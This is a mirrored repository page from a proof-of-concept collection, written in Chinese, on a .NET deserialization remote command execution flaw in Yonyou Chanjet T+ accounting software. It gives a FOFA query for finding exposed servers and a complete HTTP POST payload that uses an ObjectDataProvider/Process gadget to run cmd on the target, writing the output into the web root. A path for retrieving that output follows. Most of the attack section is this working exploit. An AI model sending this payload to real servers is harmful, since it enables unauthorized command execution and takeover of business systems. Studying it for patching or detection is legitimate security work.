admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-08 12:25:11 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web应用漏洞/用友 畅捷通T+ GetStoreWarehouseByStore 远程命令执行漏洞.md

56 lines
1.5 KiB
Markdown
Raw Normal View History

更新漏洞
2023-07-05 09:20:42 +08:00
# 用友 畅捷通T+ GetStoreWarehouseByStore 远程命令执行漏洞
## 漏洞描述
用友 畅捷通T+ GetStoreWarehouseByStore 存在 .net反序列化漏洞导致远程命令执行控制服务器
## 漏洞影响
用友 畅捷通T+
更新漏洞
2023-08-28 15:55:36 +08:00
## 网络测绘
更新漏洞
2023-07-05 09:20:42 +08:00
```
app="畅捷通-TPlus"
```
## 漏洞复现
登录页面
更新漏洞
2023-07-11 10:57:15 +08:00
![image-20230704111641427](./images/image-20230704111641427.png)
更新漏洞
2023-07-05 09:20:42 +08:00
验证POC
```
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Connection: close
Content-Length: 668
X-Ajaxpro-Method: GetStoreWarehouseByStore
Accept-Encoding: gzip
{
"storeID":{
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
"MethodName":"Start",
"ObjectInstance":{
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
"StartInfo":{
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
"FileName":"cmd",
"Arguments":"/c whoami > C:/Progra~2/Chanjet/TPlusStd/WebSite/2RUsL6jgx9sGX4GItQBcVfxarBM.txt"
}
}
}
}
```
更新漏洞
2023-07-11 10:57:15 +08:00
![image-20230704111653392](./images/image-20230704111653392.png)
更新漏洞
2023-07-05 09:20:42 +08:00
```
/tplus/xxx.txt
```
更新漏洞
2023-07-11 10:57:15 +08:00
![image-20230704111706616](./images/image-20230704111706616.png)
Reference in New Issue Copy Permalink